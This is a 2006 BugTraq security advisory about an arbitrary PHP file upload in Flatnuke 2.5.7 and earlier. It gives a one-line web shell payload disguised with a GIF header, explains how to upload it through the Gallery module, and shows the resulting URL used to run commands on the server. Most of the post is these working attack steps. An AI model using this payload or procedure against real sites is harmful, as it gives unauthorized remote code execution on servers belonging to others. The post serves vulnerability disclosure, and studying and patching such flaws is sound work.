BugTraq
flatnuke <= 2.5.7 arbitrary php file upload Jul 13 2006 05:00PM
rgod autistici org
12/07/200619.11.54

----- Flatnuke 2.5.7 arbitrary file upload / remote code execution -------------

software:

site: http://www.flatnuke.org/

------------------------------------------------------------------------
--------

if user Gallery uploads are enabled (not the default) you can go to:

http://[target]/[path_to_flatnuke]/index.php?mod=Gallery

to upload a shell.php file, ex:

GIF86<?php system($GET[cmd]);?>

file is renamed like this:

shell_by_[username].php

now you can launch commands, ex:

http://[target]/[path]/sections/Gallery/shell_by_rgod.php?cmd=ls%20-la

------------------------------------------------------------------------
--------

rgod

site: http://rgod.altervista.org

mail: rgod @ autistici.org

------------------------------------------------------------------------
--------

original url: http://retrogod.altervista.org/flatnuke257_adv.html

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus